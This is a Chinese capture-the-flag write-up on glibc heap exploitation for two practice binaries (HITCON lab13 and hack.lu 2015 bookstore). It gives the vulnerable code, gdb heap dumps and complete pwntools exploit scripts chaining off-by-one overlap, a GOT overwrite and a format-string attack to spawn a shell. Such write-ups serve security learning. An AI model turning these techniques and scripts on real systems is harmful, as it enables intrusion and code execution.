序言:这次终于过了off-by-one来到了Chunk Extend / Overlapping,这部分在上一节也进行了学习,所以难度相对来说不会是那么大,刚起初我以为,因为第一题很简单,但做到第二题,我发觉我连格式化字符串的漏洞都不会利用,真的是太菜了,后面看了看雪大佬的文章才会做
1.1. HITCON Trainging lab13
这道题还是相对简单的,对于前面几道来说,上一道已经用过这种方法了,而且比这复杂许多,所以差不多了,不过还有些小细节注意下就好
1.1.1. 功能分析
引用于ctf-wiki
- 创建堆,根据用户输入的长度,申请对应内存空间,并利用 read 读取指定长度内容。这里长度没有进行检测,当长度为负数时,会出现任意长度堆溢出的漏洞。当然,前提是可以进行 malloc。此外,这里读取之后并没有设置 NULL。
- 编辑堆,根据指定的索引以及之前存储的堆的大小读取指定内容,但是这里读入的长度会比之前大 1,所以会存在 off by one 的漏洞。
- 展示堆,输出指定索引堆的大小以及内容。
- 删除堆,删除指定堆,并且将对应指针设置为了 NULL。
1.1.2. 漏洞点分析
漏洞点存在off-by-one,通过off-by-one进行overlapping就成了
1.1.3. 漏洞利用过程
gdb-peda$ x/50gx 0x1775030-0x30 0x1775000: 0x0000000000000000 0x0000000000000021 #结构体1 0x1775010: 0x0000000000000018 0x0000000001775030 0x1775020: 0x0000000000000000 0x0000000000000021 #数据块1 chunk 0x1775030: 0x0000000a31313131 0x0000000000000000 0x1775040: 0x0000000000000000 0x0000000000000021 #结构体1 0x1775050: 0x0000000000000010 0x0000000001775070 0x1775060: 0x0000000000000000 0x0000000000000021 #数据块2 chunk 0x1775070: 0x0000000a32323232 0x0000000000000000 0x1775080: 0x0000000000000000 0x0000000000020f81 0x1775090: 0x0000000000000000 0x0000000000000000 0x17750a0: 0x0000000000000000 0x0000000000000000 0x17750b0: 0x0000000000000000 0x0000000000000000 0x17750c0: 0x0000000000000000 0x0000000000000000 0x17750d0: 0x0000000000000000 0x0000000000000000 0x17750e0: 0x0000000000000000 0x0000000000000000 0x17750f0: 0x0000000000000000 0x0000000000000000 0x1775100: 0x0000000000000000 0x0000000000000000 0x1775110: 0x0000000000000000 0x0000000000000000 0x1775120: 0x0000000000000000 0x0000000000000000 0x1775130: 0x0000000000000000 0x0000000000000000 0x1775140: 0x0000000000000000 0x0000000000000000 0x1775150: 0x0000000000000000 0x0000000000000000 0x1775160: 0x0000000000000000 0x0000000000000000 0x1775170: 0x0000000000000000 0x0000000000000000 0x1775180: 0x0000000000000000 0x0000000000000000
攻击过程:
- 创建两个堆块初始化(实际创了4个堆块,两个结构体堆块,两个数据堆块)至于一个为什么要0x18,因为要利用他会使用下个chunk的pre_size作为数据部分,这样才能off-by-one溢出到size
- 编辑第0块堆块,利用off-by-one覆盖第二块堆块的size,修改size为0x41
gdb-peda$ x/50gx 0x8a5030-0x30 0x8a5000: 0x0000000000000000 0x0000000000000021 0x8a5010: 0x0000000000000018 0x00000000008a5030 0x8a5020: 0x0000000000000000 0x0000000000000021 0x8a5030: 0x0068732f6e69622f 0x6161616161616161 #/bin/sh为后面做准备 0x8a5040: 0x6161616161616161 0x0000000000000041 # off-by-one 0x8a5050: 0x0000000000000010 0x00000000008a5070 0x8a5060: 0x0000000000000000 0x0000000000000021 0x8a5070: 0x0000000a32323232 0x0000000000000000 0x8a5080: 0x0000000000000000 0x0000000000020f81 0x8a5090: 0x0000000000000000 0x0000000000000000 0x8a50a0: 0x0000000000000000 0x0000000000000000 0x8a50b0: 0x0000000000000000 0x0000000000000000 0x8a50c0: 0x0000000000000000 0x0000000000000000 0x8a50d0: 0x0000000000000000 0x0000000000000000 0x8a50e0: 0x0000000000000000 0x0000000000000000 0x8a50f0: 0x0000000000000000 0x0000000000000000 0x8a5100: 0x0000000000000000 0x0000000000000000 0x8a5110: 0x0000000000000000 0x0000000000000000 0x8a5120: 0x0000000000000000 0x0000000000000000 0x8a5130: 0x0000000000000000 0x0000000000000000 0x8a5140: 0x0000000000000000 0x0000000000000000 0x8a5150: 0x0000000000000000 0x0000000000000000 0x8a5160: 0x0000000000000000 0x0000000000000000 0x8a5170: 0x0000000000000000 0x0000000000000000 0x8a5180: 0x0000000000000000 0x0000000000000000
- free掉第1块,这时候free了一个0x40大小的堆块和一个0x20大小的堆块
gdb-peda$ x/50gx 0xf89030-0x30 0xf89000: 0x0000000000000000 0x0000000000000021 0xf89010: 0x0000000000000018 0x0000000000f89030 0xf89020: 0x0000000000000000 0x0000000000000021 0xf89030: 0x0068732f6e69622f 0x6161616161616161 0xf89040: 0x6161616161616161 0x0000000000000041 #free 0x40大小 0xf89050: 0x0000000000000000 0x0000000000f89070 0xf89060: 0x0000000000000000 0x0000000000000021 #free 0x21大小 0xf89070: 0x0000000000000000 0x0000000000000000 0xf89080: 0x0000000000000000 0x0000000000020f81 0xf89090: 0x0000000000000000 0x0000000000000000 0xf890a0: 0x0000000000000000 0x0000000000000000 0xf890b0: 0x0000000000000000 0x0000000000000000 0xf890c0: 0x0000000000000000 0x0000000000000000 0xf890d0: 0x0000000000000000 0x0000000000000000 0xf890e0: 0x0000000000000000 0x0000000000000000 0xf890f0: 0x0000000000000000 0x0000000000000000 0xf89100: 0x0000000000000000 0x0000000000000000 0xf89110: 0x0000000000000000 0x0000000000000000 0xf89120: 0x0000000000000000 0x0000000000000000 0xf89130: 0x0000000000000000 0x0000000000000000 0xf89140: 0x0000000000000000 0x0000000000000000 0xf89150: 0x0000000000000000 0x0000000000000000 0xf89160: 0x0000000000000000 0x0000000000000000 0xf89170: 0x0000000000000000 0x0000000000000000 0xf89180: 0x0000000000000000 0x0000000000000000
- 这时候create(0x30)的话,会先创建结构体的堆块,这时候fastbin链上有刚free掉的堆块,所以优先使用,创建了0x20大小堆块,然后在创建一个0x40的chunk,这时候可以覆盖掉他的结构体部分的内容指针,泄露地址,在写入就成了
1.1.4. exp
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from PwnContext.core import * local = True # Set up pwntools for the correct architecture exe = './' + 'heapcreator' elf = context.binary = ELF(exe) #don't forget to change it host = '127.0.0.1' port = 10000 #don't forget to change it #ctx.binary = './' + 'heapcreator' ctx.binary = exe libc = args.LIBC or 'libc.so.6' ctx.debug_remote_libc = True ctx.remote_libc = ELF('libc.so.6') if local: context.log_level = 'debug' try: r = ctx.start() except Exception as e: print(e.args) print("It can't work,may be it can't load the remote libc!") print("It will load the local process") io = process(exe) else: io = remote(host,port) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: No PIE (0x400000) heap = elf libc = ELF('./libc.so.6') def create(size, content): r.recvuntil(":") r.sendline("1") r.recvuntil(":") r.sendline(str(size)) r.recvuntil(":") r.sendline(content) def edit(idx, content): r.recvuntil(":") r.sendline("2") r.recvuntil(":") r.sendline(str(idx)) r.recvuntil(":") r.sendline(content) def show(idx): r.recvuntil(":") r.sendline("3") r.recvuntil(":") r.sendline(str(idx)) def delete(idx): r.recvuntil(":") r.sendline("4") r.recvuntil(":") r.sendline(str(idx)) def exp(): free_got = 0x602018 create(0x18, "1111") # 0 create(0x10, "2222") # 1 # overwrite heap 1's struct's size to 0x41 edit(0, "/bin/sh\x00" + "a" * 0x10 + "\x41") # trigger heap 1's struct to fastbin 0x40 # heap 1's content to fastbin 0x20 delete(1) # new heap 1's struct will point to old heap 1's content, size 0x20 # new heap 1's content will point to old heap 1's struct, size 0x30 # that is to say we can overwrite new heap 1's struct # here we overwrite its heap content pointer to free@got create(0x30, p64(0) * 4 + p64(0x30) + p64(heap.got['free'])) #1 #create(0x30, p64(0x1234567890)) #1 gdb.attach(r) # leak freeaddr show(1) r.recvuntil("Content : ") data = r.recvuntil("Done !") free_addr = u64(data.split("\n")[0].ljust(8, "\x00")) libc_base = free_addr - libc.symbols['free'] log.success('libc base addr: ' + hex(libc_base)) system_addr = libc_base + libc.symbols['system'] #gdb.attach(r) # overwrite free@got with system addr edit(1, p64(system_addr)) # trigger system("/bin/sh") delete(0) if __name__ == '__main__': exp() r.interactive()
1.2. 2015 hacklu bookstore
1.2.1. 功能分析
先进行功能分析
- 有编辑功能,编辑已存在的1,2堆块,可溢出
- 删除功能,删除已存在的1,2堆块,uaf
- 合并功能,将1,2两个堆块合并,格式化字符串
1.2.2. 漏洞点分析
- 漏洞点1(任意写,\n才结束)
unsigned __int64 __fastcall edit_order(char *a1) { int idx; // eax int v3; // [rsp+10h] [rbp-10h] int cnt; // [rsp+14h] [rbp-Ch] unsigned __int64 v5; // [rsp+18h] [rbp-8h] v5 = __readfsqword(0x28u); v3 = 0; cnt = 0; while ( v3 != '\n' )//关键点 { v3 = fgetc(stdin); idx = cnt++; a1[idx] = v3; } a1[cnt - 1] = 0; return __readfsqword(0x28u) ^ v5; }
- 漏洞点2(uaf)
free后指针没置空
unsigned __int64 __fastcall delete_order(void *a1) { unsigned __int64 v2; // [rsp+18h] [rbp-8h] v2 = __readfsqword(0x28u); free(a1); //重点 return __readfsqword(0x28u) ^ v2; }
- 格式化字符串
signed __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v4; // [rsp+4h] [rbp-BCh] char *v5; // [rsp+8h] [rbp-B8h] char *first_order; // [rsp+18h] [rbp-A8h] char *second_order; // [rsp+20h] [rbp-A0h] char *dest; // [rsp+28h] [rbp-98h] char s; // [rsp+30h] [rbp-90h] unsigned __int64 v10; // [rsp+B8h] [rbp-8h] v10 = __readfsqword(0x28u); first_order = (char *)malloc(0x80uLL); second_order = (char *)malloc(0x80uLL); dest = (char *)malloc(0x80uLL); if ( !first_order || !second_order || !dest ) { fwrite("Something failed!\n", 1uLL, 0x12uLL, stderr); return 1LL; } v4 = 0; puts( " _____ _ _ _ _ _ \n" "/__ \\_____ _| |_| |__ ___ ___ | | __ ___| |_ ___ _ __ ___ / \\\n" " / /\\/ _ \\ \\/ / __| '_ \\ / _ \\ / _ \\| |/ / / __| __/ _ \\| '__/ _ \\/ /\n" " / / | __/> <| |_| |_) | (_) | (_) | < \\__ \\ || (_) | | | __/\\_/ \n" " \\/ \\___/_/\\_\\\\__|_.__/ \\___/ \\___/|_|\\_\\ |___/\\__\\___/|_| \\___\\/ \n" "Crappiest and most expensive books for your college education!\n" "\n" "We can order books for you in case they're not in stock.\n" "Max. two orders allowed!\n"); LABEL_14: while ( !v4 ) { puts("1: Edit order 1"); puts("2: Edit order 2"); puts("3: Delete order 1"); puts("4: Delete order 2"); puts("5: Submit"); fgets(&s, 0x80, stdin); switch ( s ) { case '1': puts("Enter first order:"); edit_order(first_order); strcpy(dest, "Your order is submitted!\n"); goto LABEL_14; case '2': puts("Enter second order:"); edit_order(second_order); strcpy(dest, "Your order is submitted!\n"); goto LABEL_14; case '3': delete_order(first_order); goto LABEL_14; case '4': delete_order(second_order); goto LABEL_14; case '5': v5 = (char *)malloc(0x140uLL); if ( !v5 ) { fwrite("Something failed!\n", 1uLL, 0x12uLL, stderr); return 1LL; } submit(v5, first_order, second_order); v4 = 1; break; default: goto LABEL_14; } } printf("%s", v5); printf(dest);//格式化字符串 return 0LL; }
1.2.3. 漏洞利用过程
这题有三个明显的洞,比原来那些只有一个洞的看起来似乎简单些?实际相反,这道题利用起来难度比前面的还大,因为这个洞不好利用,我自己研究了好久也无果,然后找writeup
看了看雪大佬的文章才知道这题怎么利用的
开始我在想如何利用格式化字符串的洞,因为格式化字符串的洞在合并过后才会使用,而我没想到什么便捷方法能修改第三块堆块的内容,他只能被覆盖为默认的Your order is submitted!\n,后来才知道用overlaping后可以覆盖到第三块堆块的内容,不过还是得精心布置堆才可以利用到
- 开头程序malloc(0x80)申请了三个堆块,我们将第二块free掉
gdb-peda$ x/100gx 0x1b8d010-0x010 0x1b8d000: 0x0000000000000000 0x0000000000000091 #堆块1 0x1b8d010: 0x0000000074736574 0x0000000000000000 0x1b8d020: 0x0000000000000000 0x0000000000000000 0x1b8d030: 0x0000000000000000 0x0000000000000000 0x1b8d040: 0x0000000000000000 0x0000000000000000 0x1b8d050: 0x0000000000000000 0x0000000000000000 0x1b8d060: 0x0000000000000000 0x0000000000000000 0x1b8d070: 0x0000000000000000 0x0000000000000000 0x1b8d080: 0x0000000000000000 0x0000000000000000 0x1b8d090: 0x0000000000000000 0x0000000000000091 #堆块2,溢出修改处 0x1b8d0a0: 0x0000000000000000 0x0000000000000000 #数据部分 0x1b8d0b0: 0x0000000000000000 0x0000000000000000 0x1b8d0c0: 0x0000000000000000 0x0000000000000000 0x1b8d0d0: 0x0000000000000000 0x0000000000000000 0x1b8d0e0: 0x0000000000000000 0x0000000000000000 0x1b8d0f0: 0x0000000000000000 0x0000000000000000 0x1b8d100: 0x0000000000000000 0x0000000000000000 0x1b8d110: 0x0000000000000000 0x0000000000000000 0x1b8d120: 0x0000000000000000 0x0000000000000091 #堆块3 0x1b8d130: 0x64726f2072756f59 0x7573207369207265 0x1b8d140: 0x2164657474696d62 0x000000000000000a 0x1b8d150: 0x0000000000000000 0x0000000000000000 0x1b8d160: 0x0000000000000000 0x0000000000000000 0x1b8d170: 0x0000000000000000 0x0000000000000000 0x1b8d180: 0x0000000000000000 0x0000000000000000 0x1b8d190: 0x0000000000000000 0x0000000000000000 0x1b8d1a0: 0x0000000000000000 0x0000000000000000 0x1b8d1b0: 0x0000000000000000 0x0000000000000411 0x1b8d1c0: 0x696d627553203a35 0x20726564726f0a74 0x1b8d1d0: 0x216465776f0a0a32 0x6163206e6920750a 0x1b8d1e0: 0x2779656874206573 0x6920746f6e206572 0x1b8d1f0: 0x2e6b636f7473206e 0x5f0a216e6f69740a 0x1b8d200: 0x0a2020202f5c5f5f 0x0000000000000000 0x1b8d210: 0x0000000000000000 0x0000000000000000 0x1b8d220: 0x0000000000000000 0x0000000000000000 0x1b8d230: 0x0000000000000000 0x0000000000000000 0x1b8d240: 0x0000000000000000 0x0000000000000000 0x1b8d250: 0x0000000000000000 0x0000000000000000 0x1b8d260: 0x0000000000000000 0x0000000000000000 0x1b8d270: 0x0000000000000000 0x0000000000000000 0x1b8d280: 0x0000000000000000 0x0000000000000000 0x1b8d290: 0x0000000000000000 0x0000000000000000 0x1b8d2a0: 0x0000000000000000 0x0000000000000000 0x1b8d2b0: 0x0000000000000000 0x0000000000000000 0x1b8d2c0: 0x0000000000000000 0x0000000000000000 0x1b8d2d0: 0x0000000000000000 0x0000000000000000 0x1b8d2e0: 0x0000000000000000 0x0000000000000000 0x1b8d2f0: 0x0000000000000000 0x0000000000000000 0x1b8d300: 0x0000000000000000 0x0000000000000000 0x1b8d310: 0x0000000000000000 0x0000000000000000
编辑第一块堆块内容,溢出到第二块的size,修改第二块的size为0x150,为什么是0x150?(因为你看程序在合并的时候有个malloc(0x140),这样合并的时候申请的堆块就会跑到这上面来,也就是说我们第二块堆块跟第三块堆块这时候会重合
gdb-peda$ x/50gx 0x1695028-0x28 0x1695000: 0x0000000000000000 0x0000000000000091 0x1695010: 0x3125633731363225 0x313325516e682433 0x1695020: 0x7024383225507024 0x6161616161616161 0x1695030: 0x6161616161616161 0x6161616161616161 0x1695040: 0x6161616161616161 0x6161616161616161 0x1695050: 0x6161616161616161 0x6161616161616161 0x1695060: 0x6161616161616161 0x6161616161616161 0x1695070: 0x6161616161616161 0x6161616161616161 0x1695080: 0x0000000061616161 0x0000000000000000 0x1695090: 0x0000000000000000 0x0000000000000151 0x16950a0: 0x00007f0e99412b00 0x00007f0e99412b78 0x16950b0: 0x0000000000000000 0x0000000000000000 0x16950c0: 0x0000000000000000 0x0000000000000000 0x16950d0: 0x0000000000000000 0x0000000000000000 0x16950e0: 0x0000000000000000 0x0000000000000000 0x16950f0: 0x0000000000000000 0x0000000000000000 0x1695100: 0x0000000000000000 0x0000000000000000 0x1695110: 0x0000000000000000 0x0000000000000000 0x1695120: 0x0000000000000090 0x0000000000000090 0x1695130: 0x64726f2072756f59 0x7573207369207265 0x1695140: 0x2164657474696d62 0x000000000000000a 0x1695150: 0x0000000000000000 0x0000000000000000 0x1695160: 0x0000000000000000 0x0000000000000000 0x1695170: 0x0000000000000000 0x0000000000000000 0x1695180: 0x0000000000000000 0x0000000000000000
然后submit的时候具体会变成什么样呢?,会先复制Order 1: ,然后在复制chunk1里的内容,在复制chunk2里的内容,注意注意chunk2的内容现在是什么,是前面的Order 1: 在加上chunk1的内容,因为堆块2的指针还指向chunk2的数据部分,所以会复制两次
- 就是Order 1: +chunk1+'\n'+Order 2: +Order 1: +chun1+'\n'
- 如果我们要利用格式化字符串的洞的话,要精确复制到堆块3的size部分后就停止,到这部分大小是0x90
- 也就是说我们Order 1: +chunk1+'\n'+Order 2: +Order 1: 这个的大小要为0x90,求出chunk大小,0x90-9*3-1=0x88-0x1c=0x74
- 所以我们可以在前面0x74里写格式化字符串的利用,后面就利用得上了
这是合并后的结果
gdb-peda$ x/56gx 0x6e6028-0x28 0x6e6000: 0x0000000000000000 0x0000000000000091 0x6e6010: 0x3125633731363225 0x313325516e682433 0x6e6020: 0x7024383225507024 0x6161616161616161 0x6e6030: 0x6161616161616161 0x6161616161616161 0x6e6040: 0x6161616161616161 0x6161616161616161 0x6e6050: 0x6161616161616161 0x6161616161616161 0x6e6060: 0x6161616161616161 0x6161616161616161 0x6e6070: 0x6161616161616161 0x6161616161616161 0x6e6080: 0x0000000061616161 0x0000000000000000 0x6e6090: 0x0000000000000000 0x0000000000000151 0x6e60a0: 0x3a3120726564724f 0x2563373136322520 0x6e60b0: 0x3325516e68243331 0x2438322550702431 0x6e60c0: 0x6161616161616170 0x6161616161616161 0x6e60d0: 0x6161616161616161 0x6161616161616161 0x6e60e0: 0x6161616161616161 0x6161616161616161 0x6e60f0: 0x6161616161616161 0x6161616161616161 0x6e6100: 0x6161616161616161 0x6161616161616161 0x6e6110: 0x6161616161616161 0x724f0a6161616161 0x6e6120: 0x4f203a3220726564 0x203a312072656472 0x6e6130: 0x3125633731363225 0x313325516e682433 0x6e6140: 0x7024383225507024 0x6161616161616161 0x6e6150: 0x6161616161616161 0x6161616161616161 0x6e6160: 0x6161616161616161 0x6161616161616161 0x6e6170: 0x6161616161616161 0x6161616161616161 0x6e6180: 0x6161616161616161 0x6161616161616161 0x6e6190: 0x6161616161616161 0x6161616161616161 0x6e61a0: 0x64724f0a61616161 0x000a203a32207265 0x6e61b0: 0x0000000000000000 0x0000000000000411
- 既然是堆题我就不再讲格式化字符串利用了,后面先利用格式化字符串修改.fini的地址,这样能多返回一次到main函数,同时泄露libc函数地址,为什么修改.fini里的地址能多返回一次main函数呢,请看
linux_x86程序启动中文版
linux_x86程序启动英文版
这两篇文章一样的,不过一个中文版,一个英文版,建议英文好的同学读原版,因为.fini在exit前会进行调用,所以修改后能执行多一次main函数
- 这时候发觉泄露出libc后不知道修改哪个函数了,因为调用printf后再也没函数用了,这时候思路又断了
- 所以这时候想想别的办法,发觉栈上存了一个与存main函数返回地址的指针存在一定偏移的地址,所以泄露出来后,在减掉那个固定偏移就可以修改main函数返回地址了
注意:这里格式化字符串内容存在堆里,指针存在栈上,所以我们fgets输入的才是对应上的偏移
1.2.4. exp
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from PwnContext.core import * local = True # Set up pwntools for the correct architecture exe = './' + 'books' elf = context.binary = ELF(exe) #don't forget to change it host = '127.0.0.1' port = 10000 #don't forget to change it #ctx.binary = './' + 'books' ctx.binary = exe libc = args.LIBC or 'libc.so.6' ctx.debug_remote_libc = True ctx.remote_libc = libc if local: context.log_level = 'debug' p = ctx.start() libc = ELF(libc) else: p = remote(host,port) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: No RELRO # Stack: Canary found # NX: NX enabled # PIE: No PIE (0x400000) def edit(idx, content) : p.sendline(str(idx)) p.recvregex(r'''Enter (.*?) order:\n''') p.sendline(content) def delete(idx) : p.sendline(str(idx+2)) def submit(content) : p.sendline('5'+ '\x00'*7 + content) def exp(): fini_array = 0x6011B8 main_addr = 0x400A39 delete(2) #first step #leak fmstr = "%{}c%{}$hnQ%{}$pP%{}$p".format(0xA39, 13, 31, 28) payload = fmstr.ljust(0x74, 'a') payload = payload.ljust(0x88, '\x00') payload += p64(0x151) edit(1, payload) #offset=13 gdb.attach(p) submit(p64(fini_array)) for _ in range(3): p.recvuntil('Q') __libc_start_main_addr = int(p.recv(14), 16) libc_base = __libc_start_main_addr - libc.symbols['__libc_start_main']-240 ret_addr = int(p.recv(15)[1:], 16)-0x1e8 one_gadget_offset = 0x45216 #one_gadget_offset = 0x4526a #one_gadget_offset = 0xf02a4 #one_gadget_offset = 0xf1147 one_gadget = libc_base + one_gadget_offset p.success("libc_base-> 0x%x" % libc_base) p.success("ret_addr-> 0x%x" % ret_addr) p.success("one_gadget-> 0x%x" % one_gadget) #second step delete(2) part1 = ((one_gadget>>16)& 0xffff) part2 = (one_gadget & 0xffff) part =[ (part1, p64(ret_addr+2)), (part2, p64(ret_addr)) ] part.sort(key=lambda tup: tup[0]) size = [i[0] for i in part] addr =''.join(x[1] for x in part) print(size) print(addr) fmstr = "%{}c%{}$hn".format(size[0], 13) fmstr += "%{}c%{}$hn".format(size[1]-size[0], 14) payload = fmstr.ljust(0x74, 'a') payload = payload.ljust(0x88, '\x00') payload += p64(0x151) edit(1, payload) #offset=13 submit(addr) #gdb.attach(p) if __name__ == '__main__': exp() p.interactive()
1.3. 总结
- 这道题堆部分难点部分想到了就不难,没想到就难,就是要利用那个部分溢出到第三个堆块
- 其余部分就全是格式化字符串的利用了,没什么好讲的
- 这道题拿到shell也偏废时间,最主要直接看exp我看不懂,后面去看文章才看懂的
1.4. 参考链接
文章来源: http://xz.aliyun.com/t/6252
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh